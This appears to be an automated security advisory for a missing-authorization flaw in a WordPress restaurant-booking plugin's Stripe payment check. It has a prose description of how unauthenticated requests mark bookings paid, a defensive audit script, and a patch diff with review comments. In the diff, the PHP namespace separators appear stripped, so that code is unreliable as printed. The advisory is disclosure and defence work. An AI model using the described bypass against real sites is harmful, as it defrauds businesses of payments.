Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 28, 2026

CVE-2026-54830: Five Star Restaurant Reservations – WordPress Booking Plugin <= 2.7.19 Missing Authorization PoC, Patch Analysis & Rule

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 2.7.19
Patched Version: 2.7.20
Disclosed: June 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-54830:

This vulnerability is a missing authorization issue in the Five Star Restaurant Reservations – WordPress Booking Plugin, version 2.7.19 and earlier. The plugin fails to enforce a capability check on a function that processes payment confirmation, allowing unauthenticated attackers to trigger an unauthorized action.

Root Cause: The root cause lies in the `valid_payment()` function inside `/restaurant-reservations/includes/PaymentGatewayStripe.class.php`. In the vulnerable version, this function at line 449 only checks if the stored `$booking->stripe_payment_intent_id` is non-empty and matches the posted `payment_id` parameter. It does not verify the user’s authentication or capabilities, nor does it verify with Stripe’s API that the payment actually succeeded. This allows an attacker to bypass payment validation entirely.

Exploitation: An unauthenticated attacker can exploit this by sending a POST request to the WordPress AJAX handler (`/wp-admin/admin-ajax.php`) with the appropriate `action` parameter that triggers payment processing. The attacker must supply a valid-looking `payment_id` that matches a previously stored intent ID. No authentication or nonce validation is required. The attacker can manipulate the booking’s deposit amount or receipt_id by sending crafted `payment_amount` and `payment_id` POST parameters.

Patch Analysis: The patch completely rewrites the `valid_payment()` function. The new version adds multiple layers of security: (1) It checks that the required Stripe libraries are loaded. (2) It retrieves the PaymentIntent from Stripe’s API using the stored intent ID. (3) It validates the intent’s status against the expected status (`succeeded` for normal payments, `requires_capture` for hold payments). (4) It replaces the previous simple comparison of `$_POST['payment_id']` with a server-verified Stripe API call. The deposit amount is now read directly from the verified Stripe intent rather than from user input.

Impact: Successful exploitation allows an unauthenticated attacker to mark bookings as paid without completing a real payment. This can lead to unauthorized reservation confirmations, bypassing the payment requirement for paid bookings. In scenarios where bookings grant access to premium features or events, this constitutes a privilege escalation with financial impact.
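
For sites that ran 2.7.19 or earlier, the impact above can be checked after the fact by reconciling bookings recorded as paid against the PaymentIntent records. The following is an added example, not part of the original analysis or the plugin's code; the export layout, the `booking_id` and `is_hold` fields, the function names and all sample values are constructed assumptions, and hold bookings are assumed to reach `succeeded` once captured.

```python
from collections import Counter
from dataclasses import dataclass

# The plugin code in the diff special-cases only JPY as a currency
# without minor units, so this audit mirrors that.
ZERO_DECIMAL = {"JPY"}


@dataclass(frozen=True)
class Booking:
    """One row of a hypothetical export of bookings recorded as paid."""
    booking_id: int   # assumed identifier, not a field named on the page
    receipt_id: str   # the plugin stores the payment id here
    deposit: float    # deposit in major currency units
    is_hold: bool     # assumed flag: site used hold / manual capture


def to_minor_units(amount, currency):
    """Convert a stored deposit to the integer amount an intent carries."""
    if currency.upper() in ZERO_DECIMAL:
        return int(round(amount))
    return int(round(amount * 100))


def audit_bookings(bookings, intents, currency):
    """Return (booking_id, reason) for bookings the intent records do not back.

    `intents` maps an intent id to a dict with `status` and `amount`,
    as previously fetched from the payment processor (no network here).
    """
    findings = []
    uses = Counter(b.receipt_id for b in bookings)
    for b in bookings:
        intent = intents.get(b.receipt_id)
        if intent is None:
            # receipt_id came from request data in the vulnerable version
            findings.append((b.booking_id, "intent_not_found"))
            continue
        allowed = {"succeeded"}
        if b.is_hold:
            allowed.add("requires_capture")
        if intent["status"] not in allowed:
            findings.append((b.booking_id, "status_" + intent["status"]))
        elif intent["amount"] != to_minor_units(b.deposit, currency):
            # the vulnerable version took the deposit from payment_amount
            findings.append((b.booking_id, "amount_mismatch"))
        elif uses[b.receipt_id] > 1:
            findings.append((b.booking_id, "receipt_reused"))
    return findings


# Constructed sample data for illustration only.
SAMPLE_INTENTS = {
    "pi_constructed_001": {"status": "succeeded", "amount": 2500},
    "pi_constructed_002": {"status": "requires_payment_method", "amount": 2500},
    "pi_constructed_003": {"status": "succeeded", "amount": 500},
    "pi_constructed_004": {"status": "requires_capture", "amount": 4000},
}
SAMPLE_BOOKINGS = [
    Booking(101, "pi_constructed_001", 25.00, False),
    Booking(102, "pi_constructed_002", 25.00, False),
    Booking(103, "pi_constructed_003", 25.00, False),
    Booking(104, "pi_constructed_004", 40.00, True),
    Booking(105, "pi_constructed_999", 25.00, False),
]

if __name__ == "__main__":
    for booking_id, reason in audit_bookings(SAMPLE_BOOKINGS, SAMPLE_INTENTS, "USD"):
        print(f"booking {booking_id}: {reason}")
```

Bookings flagged here were marked paid without a matching, completed intent and should be reviewed manually before being honoured or cancelled.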

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/restaurant-reservations/includes/PaymentGatewayStripe.class.php
+++ b/restaurant-reservations/includes/PaymentGatewayStripe.class.php
@@ -216,7 +216,7 @@
     // retrieve the token generated by stripe.js
     $token = sanitize_text_field( $_POST['stripeToken'] );

-    // JPY currency does not have any decimal palces
+    // JPY currency does not have any decimal places
     $payment_amount = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? $booking->calculate_deposit() * 100 : $booking->calculate_deposit();

     try {
@@ -231,8 +231,8 @@
         )
       );

-      StripeStripe::setApiKey( $this->get_secret() );
-      $charge = StripeCharge::create(
+      rtbStripeStripe::setApiKey( $this->get_secret() );
+      $charge = rtbStripeCharge::create(
         array(
           'amount'    => $payment_amount,
           'currency'  => strtolower( $rtb_controller->settings->get_setting( 'rtb-currency' ) ),
@@ -308,9 +308,9 @@

     try {

-      StripeStripe::setApiKey( $this->get_secret() );
+      rtbStripeStripe::setApiKey( $this->get_secret() );

-      // $customer = StripeCustomer::create(array(
+      // $customer = rtbStripeCustomer::create(array(
       //  'email' => $booking->email,
       //  'name' => $booking->name
       // );
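
Review bot: the commented-out `$customer = ...Customer::create(array(` block is dead code that is now being carried through the namespace rename. Delete it rather than maintaining it, or restore it with a comment saying why it is kept.
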
@@ -357,7 +357,7 @@
         $intent_data['capture_method'] = 'manual';
       }

-      $intent = StripePaymentIntent::create( $intent_data );
+      $intent = rtbStripePaymentIntent::create( $intent_data );

       // Used this for verification of two step payment processing under SCA
       $booking->stripe_payment_intent_id = $intent->id;
@@ -412,9 +412,18 @@
           throw new Exception( __( 'Invalid submission. Please contact admin', 'restaurant-reservations' ) );
         }

-        $booking->deposit = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? intval( $_POST['payment_amount'] ) / 100 : intval( $_POST['payment_amount'] );
+        // Read the amount from the verified Stripe intent:

-        $booking->receipt_id = sanitize_text_field( $_POST['payment_id'] );
+        // load the stripe libraries
+        require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );
+
+        rtbStripeStripe::setApiKey( $this->get_secret() );
+
+        $intent = rtbStripePaymentIntent::retrieve( $booking->stripe_payment_intent_id );
+
+        $booking->deposit = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? $intent->amount / 100 : $intent->amount;
+
+        $booking->receipt_id = $intent->id;

         // Not needed anymore
         unset( $booking->stripe_payment_intent_id );
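
Review bot: `$booking->deposit` is now taken from `$intent->amount`, but nothing in this hunk compares that amount with what the booking should cost. Compare it against the expected deposit (the charge path uses `$booking->calculate_deposit()`) before recording the booking as paid. The `PaymentIntent::retrieve( $booking->stripe_payment_intent_id )` call here also repeats the lookup done in `valid_payment()`; returning the verified intent from that function would keep the status check and the amount on the same object. The comment `// Read the amount from the verified Stripe intent:` sits several lines above the assignment it describes and should move next to it.
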
@@ -449,13 +458,48 @@
   }

   /**
-   * Validate the payment success request by verifing the payment_intent ID
+   * Validate the payment success request by verifying the payment_intent ID
    *
-   * @return bool true on valid else false
+   * @param  rtbBooking $booking
+   * @return bool true if Stripe confirms payment else false
    */
   public function valid_payment( $booking ) {
+    global $rtb_controller;
+
+    // Must have an intent ID stored server-side from the intent-creation step
+    if ( empty( $booking->stripe_payment_intent_id ) ) { return false; }
+
+    // The posted payment_id must match what we stored
+    $posted_id = sanitize_text_field( $_POST['payment_id'] ?? '' );
+    if ( $posted_id !== $booking->stripe_payment_intent_id ) { return false; }
+
+    // Ask Stripe if the intent was actually paid
+    try {
+
+      // load the stripe libraries
+      require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );
+
+      rtbStripeStripe::setApiKey( $this->get_secret() );

-    return ! empty( $booking->stripe_payment_intent_id ) && sanitize_text_field( $_POST['payment_id'] ) === $booking->stripe_payment_intent_id;
+      $intent = rtbStripePaymentIntent::retrieve( $booking->stripe_payment_intent_id );
+
+      $is_hold = $rtb_controller->settings->get_setting( 'rtb-stripe-hold' );
+
+      // For normal payments: status must be 'succeeded'
+      // For hold/manual-capture: status must be 'requires_capture'
+      $valid_status = $is_hold ? 'requires_capture' : 'succeeded';
+
+      return $intent->status === $valid_status;
+    }
+    catch ( Exception $ex ) {
+
+      if ( defined('WP_DEBUG') && WP_DEBUG ) {
+
+        error_log( sprintf( __( 'Five Star RTB Stripe valid_payment error: %s', 'restaurant-reservations' ), $ex->getMessage() ) );
+      }
+
+      return false;
+    }
   }

   /**
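
Review bot: the expected status in `valid_payment()` comes from the current `rtb-stripe-hold` setting (`$valid_status = $is_hold ? 'requires_capture' : 'succeeded';`) rather than from the intent, so a settings change between intent creation and confirmation makes a genuine payment fail validation. The creation path sets `$intent_data['capture_method'] = 'manual'` for holds, so deriving the expectation from the retrieved intent's capture method would tie it to how that intent was actually created. Two smaller points: the catch block logs only when `WP_DEBUG` is on, so a Stripe API failure is silent in production, and the function still has no nonce or capability check of its own, which the docblock should state since Stripe verification is the only gate.
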
@@ -599,9 +643,9 @@
           // load the stripe libraries
           require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );

-          StripeStripe::setApiKey( $this->get_secret() );
+          rtbStripeStripe::setApiKey( $this->get_secret() );

-          $intent = StripePaymentIntent::retrieve( $booking->receipt_id );
+          $intent = rtbStripePaymentIntent::retrieve( $booking->receipt_id );
           $intent->capture();

           if( 'succeeded' == $intent->status ) {
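
Review bot: `if( 'succeeded' == $intent->status )` after `$intent->capture()` uses a loose comparison, while the new `valid_payment()` compares the status with `===`. Use the strict form here as well so status handling is consistent across the class.
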
--- a/restaurant-reservations/lib/stripe/lib/Account.php
+++ b/restaurant-reservations/lib/stripe/lib/Account.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * This is an object representing a Stripe account. You can retrieve it to see
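
Review bot: `namespace rtbStripe;` is a hand edit to a file whose header reads `// File generated from our OpenAPI spec`, and the same rename repeats through the rest of `lib/stripe`. Record how the prefix was applied (script or tool, and the bundled library version) alongside the library so the next Stripe update can be re-prefixed the same way, and consider shipping the rename separately from the `valid_payment()` fix so the security change can be reviewed on its own.
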
@@ -15,23 +15,23 @@
  *
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property null|StripeStripeObject $business_profile Business information about the account.
+ * @property null|rtbStripeStripeObject $business_profile Business information about the account.
  * @property null|string $business_type The business type.
- * @property StripeStripeObject $capabilities
+ * @property rtbStripeStripeObject $capabilities
  * @property bool $charges_enabled Whether the account can create live charges.
- * @property StripeStripeObject $company
+ * @property rtbStripeStripeObject $company
  * @property string $country The account's country.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $default_currency Three-letter ISO currency code representing the default currency for the account. This must be a currency that <a href="https://stripe.com/docs/payouts">Stripe supports in the account's country</a>.
  * @property bool $details_submitted Whether account details have been submitted. Standard accounts cannot receive payouts before this is true.
  * @property null|string $email An email address associated with the account. You can treat this as metadata: it is not used for authentication or messaging account holders.
- * @property StripeCollection $external_accounts External accounts (bank accounts and debit cards) currently attached to this account
- * @property StripePerson $individual <p>This is an object representing a person associated with a Stripe account.</p><p>A platform cannot access a Standard or Express account's persons after the account starts onboarding, such as after generating an account link for the account. See the <a href="https://stripe.com/docs/connect/standard-accounts">Standard onboarding</a> or <a href="https://stripe.com/docs/connect/express-accounts">Express onboarding documentation</a> for information about platform pre-filling and account onboarding steps.</p><p>Related guide: <a href="https://stripe.com/docs/connect/identity-verification-api#person-information">Handling Identity Verification with the API</a>.</p>
- * @property StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property rtbStripeCollection $external_accounts External accounts (bank accounts and debit cards) currently attached to this account
+ * @property rtbStripePerson $individual <p>This is an object representing a person associated with a Stripe account.</p><p>A platform cannot access a Standard or Express account's persons after the account starts onboarding, such as after generating an account link for the account. See the <a href="https://stripe.com/docs/connect/standard-accounts">Standard onboarding</a> or <a href="https://stripe.com/docs/connect/express-accounts">Express onboarding documentation</a> for information about platform pre-filling and account onboarding steps.</p><p>Related guide: <a href="https://stripe.com/docs/connect/identity-verification-api#person-information">Handling Identity Verification with the API</a>.</p>
+ * @property rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  * @property bool $payouts_enabled Whether Stripe can send payouts to this account.
- * @property StripeStripeObject $requirements
- * @property null|StripeStripeObject $settings Options for customizing how the account functions within Stripe.
- * @property StripeStripeObject $tos_acceptance
+ * @property rtbStripeStripeObject $requirements
+ * @property null|rtbStripeStripeObject $settings Options for customizing how the account functions within Stripe.
+ * @property rtbStripeStripeObject $tos_acceptance
  * @property string $type The Stripe account type. Can be <code>standard</code>, <code>express</code>, or <code>custom</code>.
  */
 class Account extends ApiResource
@@ -144,9 +144,9 @@
      *     options array containing an `id` key
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeAccount
+     * @return rtbStripeAccount
      */
     public static function retrieve($id = null, $opts = null)
     {
@@ -162,9 +162,9 @@
      * @param null|array $clientId
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject object containing the response from the API
+     * @return rtbStripeStripeObject object containing the response from the API
      */
     public function deauthorize($clientId = null, $opts = null)
     {
@@ -180,9 +180,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of persons
+     * @return rtbStripeCollection the list of persons
      */
     public function persons($params = null, $opts = null)
     {
@@ -198,7 +198,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return Account the rejected account
      */
@@ -224,9 +224,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of capabilities
+     * @return rtbStripeCollection the list of capabilities
      */
     public static function allCapabilities($id, $params = null, $opts = null)
     {
@@ -239,9 +239,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCapability
+     * @return rtbStripeCapability
      */
     public static function retrieveCapability($id, $capabilityId, $params = null, $opts = null)
     {
@@ -254,9 +254,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCapability
+     * @return rtbStripeCapability
      */
     public static function updateCapability($id, $capabilityId, $params = null, $opts = null)
     {
@@ -270,9 +270,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of external accounts (BankAccount or Card)
+     * @return rtbStripeCollection the list of external accounts (BankAccount or Card)
      */
     public static function allExternalAccounts($id, $params = null, $opts = null)
     {
@@ -284,9 +284,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function createExternalAccount($id, $params = null, $opts = null)
     {
@@ -299,9 +299,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function deleteExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -314,9 +314,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function retrieveExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -329,9 +329,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function updateExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -345,9 +345,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeLoginLink
+     * @return rtbStripeLoginLink
      */
     public static function createLoginLink($id, $params = null, $opts = null)
     {
@@ -361,9 +361,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of persons
+     * @return rtbStripeCollection the list of persons
      */
     public static function allPersons($id, $params = null, $opts = null)
     {
@@ -375,9 +375,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function createPerson($id, $params = null, $opts = null)
     {
@@ -390,9 +390,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function deletePerson($id, $personId, $params = null, $opts = null)
     {
@@ -405,9 +405,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function retrievePerson($id, $personId, $params = null, $opts = null)
     {
@@ -420,9 +420,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function updatePerson($id, $personId, $params = null, $opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/AccountLink.php
+++ b/restaurant-reservations/lib/stripe/lib/AccountLink.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Account Links are the means by which a Connect platform grants a connected
--- a/restaurant-reservations/lib/stripe/lib/AlipayAccount.php
+++ b/restaurant-reservations/lib/stripe/lib/AlipayAccount.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class AlipayAccount.
@@ -40,7 +40,7 @@
      * @param array|string $_id
      * @param null|array|string $_opts
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      *
      * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
      * @see https://stripe.com/docs/sources/alipay
@@ -59,7 +59,7 @@
      * @param null|array $_params
      * @param null|array|string $_options
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      *
      * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
      * @see https://stripe.com/docs/sources/alipay
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/All.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/All.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for listable resources. Adds a `all()` static method to the class.
@@ -13,9 +13,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection of ApiResources
+     * @return rtbStripeCollection of ApiResources
      */
     public static function all($params = null, $opts = null)
     {
@@ -23,10 +23,10 @@
         $url = static::classUrl();

         list($response, $opts) = static::_staticRequest('get', $url, $params, $opts);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
-        if (!($obj instanceof StripeCollection)) {
-            throw new StripeExceptionUnexpectedValueException(
-                'Expected type ' . StripeCollection::class . ', got "' . get_class($obj) . '" instead.'
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
+        if (!($obj instanceof rtbStripeCollection)) {
+            throw new rtbStripeExceptionUnexpectedValueException(
+                'Expected type ' . rtbStripeCollection::class . ', got "' . get_class($obj) . '" instead.'
             );
         }
         $obj->setLastResponse($response);
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Create.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Create.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for creatable resources. Adds a `create()` static method to the class.
@@ -13,7 +13,7 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the created resource
      */
@@ -23,7 +23,7 @@
         $url = static::classUrl();

         list($response, $opts) = static::_staticRequest('post', $url, $params, $options);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Delete.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Delete.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for deletable resources. Adds a `delete()` method to the class.
@@ -13,7 +13,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the deleted resource
      */
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/NestedResource.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/NestedResource.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for resources that have nested resources.
@@ -15,14 +15,14 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _nestedResourceOperation($method, $url, $params = null, $options = null)
     {
         self::_validateParams($params);

         list($response, $opts) = static::_staticRequest($method, $url, $params, $options);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
@@ -51,9 +51,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _createNestedResource($id, $nestedPath, $params = null, $options = null)
     {
@@ -69,9 +69,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _retrieveNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -87,9 +87,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _updateNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -105,9 +105,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _deleteNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -122,9 +122,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _allNestedResources($id, $nestedPath, $params = null, $options = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Request.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Request.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for resources that need to make API requests.
@@ -12,17 +12,17 @@
     /**
      * @param null|array|mixed $params The list of parameters to validate
      *
-     * @throws StripeExceptionInvalidArgumentException if $params exists and is not an array
+     * @throws rtbStripeExceptionInvalidArgumentException if $params exists and is not an array
      */
     protected static function _validateParams($params = null)
     {
         if ($params && !is_array($params)) {
             $message = 'You must pass an array as the first argument to Stripe API '
                . 'method calls.  (HINT: an example call to create a charge '
-               . "would be: "Stripe\Charge::create(['amount' => 100, "
+               . "would be: "rtbStripe\Charge::create(['amount' => 100, "
                . "'currency' => 'usd', 'source' => 'tok_1234'])")";

-            throw new StripeExceptionInvalidArgumentException($message);
+            throw new rtbStripeExceptionInvalidArgumentException($message);
         }
     }

@@ -32,7 +32,7 @@
      * @param array $params list of parameters for the request
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return array tuple containing (the JSON response, $options)
      */
@@ -51,15 +51,15 @@
      * @param array $params list of parameters for the request
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return array tuple containing (the JSON response, $options)
      */
     protected static function _staticRequest($method, $url, $params, $options)
     {
-        $opts = StripeUtilRequestOptions::parse($options);
+        $opts = rtbStripeUtilRequestOptions::parse($options);
         $baseUrl = isset($opts->apiBase) ? $opts->apiBase : static::baseUrl();
-        $requestor = new StripeApiRequestor($opts->apiKey, $baseUrl);
+        $requestor = new rtbStripeApiRequestor($opts->apiKey, $baseUrl);
         list($response, $opts->apiKey) = $requestor->request($method, $url, $params, $opts->headers);
         $opts->discardNonPersistentHeaders();

--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Retrieve.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Retrieve.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for retrievable resources. Adds a `retrieve()` static method to the
@@ -15,13 +15,13 @@
      *     or an options array containing an `id` key
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static
      */
     public static function retrieve($id, $opts = null)
     {
-        $opts = StripeUtilRequestOptions::parse($opts);
+        $opts = rtbStripeUtilRequestOptions::parse($opts);
         $instance = new static($id, $opts);
         $instance->refresh();

--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Update.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Update.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for updatable resources. Adds an `update()` static method and a
@@ -15,7 +15,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the updated resource
      */
@@ -25,7 +25,7 @@
         $url = static::resourceUrl($id);

         list($response, $opts) = static::_staticRequest('post', $url, $params, $opts);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
@@ -34,7 +34,7 @@
     /**
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the saved resource
      */
--- a/restaurant-reservations/lib/stripe/lib/ApiRequestor.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiRequestor.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class ApiRequestor.
--- a/restaurant-reservations/lib/stripe/lib/ApiResource.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiResource.php
@@ -1,6 +1,6 @@
